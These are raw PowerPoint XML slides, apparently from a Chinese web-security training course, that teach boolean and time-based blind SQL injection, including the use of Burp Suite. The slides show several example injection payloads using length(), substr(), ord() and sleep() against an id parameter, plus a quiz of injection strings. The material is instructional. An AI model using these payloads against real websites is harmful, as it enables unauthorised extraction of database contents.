                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>EDU</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:ea typeface="方正正粗黑简体" panose="020000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82876" y="2832162"/>
            <a:ext cx="6186161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4400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>注意：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>没有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>加入班级群的同学，火速扫码加群，凭报名截图拉入班级群，我将每天在群内课后答疑！</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1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83550" y="2592070"/>
            <a:ext cx="2308860" cy="230124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Burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>工具的基础使用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18443" y="1247889"/>
            <a:ext cx="1161354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1600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Burp Suite 是用于攻击web 应用程序的集成平台，包含了许多工具。Burp Suite为这些工具设计了许多接口，以加快攻击应用程序的过程。所有工具都共享一个请求，并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr sz="1600">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>软件以及原理，安装和使用讲解视频已经打包，如下：</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="1600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>链接：https://pan.baidu.com/s/1zHP1QO4lJIf_apkV5ghitA </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="1600">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="1600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>提取码：igs3 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="1600">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1600"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443" y="3127366"/>
            <a:ext cx="8911126" cy="290624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latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>布尔型盲注</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-burp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:ea typeface="方正正粗黑简体" panose="020000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425" y="1044575"/>
            <a:ext cx="4320540" cy="17678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2812415"/>
            <a:ext cx="4046220" cy="19888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" y="5189220"/>
            <a:ext cx="4168140" cy="11734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930" y="1473200"/>
            <a:ext cx="6637020" cy="15621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30" y="3664585"/>
            <a:ext cx="6408420" cy="193548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latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>布尔型盲注</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-burp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:ea typeface="方正正粗黑简体" panose="02000000000000000000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19175" y="3344545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kanwolongxia</a:t>
            </a:r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99385" y="1056005"/>
            <a:ext cx="7703820" cy="18135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19175" y="4203700"/>
            <a:ext cx="462026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课堂小测验</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>' or length(database())&gt;1#</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>' and length(database())&gt;1 #</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>admin' and length(database())&gt;10#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344285" y="3913505"/>
            <a:ext cx="28841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navicat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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970020" y="3519805"/>
            <a:ext cx="7717790" cy="499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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>掌控安全 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>- Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>安全</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>微专业</a:t>
            </a:r>
            <a:endParaRPr sz="2600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:ea typeface="方正正粗黑简体" panose="020000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18685" y="5453380"/>
            <a:ext cx="2600325" cy="561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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>讲师</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>mss</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122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1125220" y="2731770"/>
            <a:ext cx="9595485" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="3300" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>进阶-使用盲注获得目标数据</a:t>
            </a:r>
            <a:endParaRPr sz="3300" dirty="0">
              <a:sym typeface="+mn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 descr="封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79"/>
            <a:ext cx="12256767" cy="6857643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法律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55" y="5258"/>
            <a:ext cx="12175491" cy="684875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1128754" y="302260"/>
            <a:ext cx="8685538" cy="487363"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>本章内容</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:ea typeface="方正正粗黑简体" panose="020000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90320" y="1051560"/>
            <a:ext cx="9813925" cy="5277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3600" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>进阶-使用盲注获得目标数据</a:t>
            </a:r>
            <a:endParaRPr sz="3600" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/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2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>了解注入原理，学会布尔型盲注</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500">
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>一、盲注使用场景</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2500">
              <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2500">
              <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500">
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>二、盲注函数解析</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2500">
              <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2500">
              <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500">
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>三、盲注演示</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2500">
              <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2500">
              <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500">
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>四、盲注+burp </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2500">
              <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2500">
              <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2500">
              <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:sym typeface="+mn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latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入原理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>什么是盲注</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:cs typeface="楷体" panose="0201060906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18458" y="1786976"/>
            <a:ext cx="10954449" cy="19996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3200">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Q:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>什么是盲注？   </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="32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algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>A:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>有时目标存在注入,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2800">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>但</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>在页面上没有任何回显,此时，我们需要利用一些方法进行判断或者尝试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2800">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>得到数据</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，这个过程称之为盲注。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algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="32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8345" y="3495040"/>
            <a:ext cx="3108960" cy="32004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0570" y="3529330"/>
            <a:ext cx="3070860" cy="313182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latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入原理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>盲注种类</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:cs typeface="楷体" panose="02010609060101010101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0240" y="2045970"/>
            <a:ext cx="10890885" cy="333121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1128695" y="302423"/>
            <a:ext cx="8685086" cy="487338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr>
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>盲注函数解析</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:ea typeface="方正正粗黑简体" panose="020000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90486" y="2144507"/>
            <a:ext cx="9813414" cy="25685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000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>length() 函数 返回字符串的长度</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>?id=1 and length(database())&gt;1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>substr() 截取字符串 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>从第一位截取一个</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>?id=1 and substr(database(),1,1)='k'</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ord()/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ascii() 返回字符的ascii码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500">
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>?id=1 and ord(substr(database(),1,1))=107</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2500">
              <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:ea typeface="方正正粗黑简体" panose="020000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76465" y="1831340"/>
            <a:ext cx="4122420" cy="13182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6465" y="3149600"/>
            <a:ext cx="3992880" cy="1371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6465" y="4521200"/>
            <a:ext cx="4549140" cy="10668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27025" y="4878705"/>
            <a:ext cx="612838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>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>时间型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sleep() 将程序挂起一段时间n为n秒</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>if(expr1,expr2,expr3) 判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>?id=1' and If(length(database())=8,0,sleep(5))-- +	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116195" y="1311910"/>
            <a:ext cx="39395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limit 0,1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>显示第一条</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>substr(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>内容</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>,1,1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>显示第一个字符</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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>
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>盲注演示</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:ea typeface="方正正粗黑简体" panose="02000000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28725" y="1263015"/>
            <a:ext cx="429006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猜解当前数据库名称长度：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228725" y="1583055"/>
            <a:ext cx="912685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and (length(database()))&gt;9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>#</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
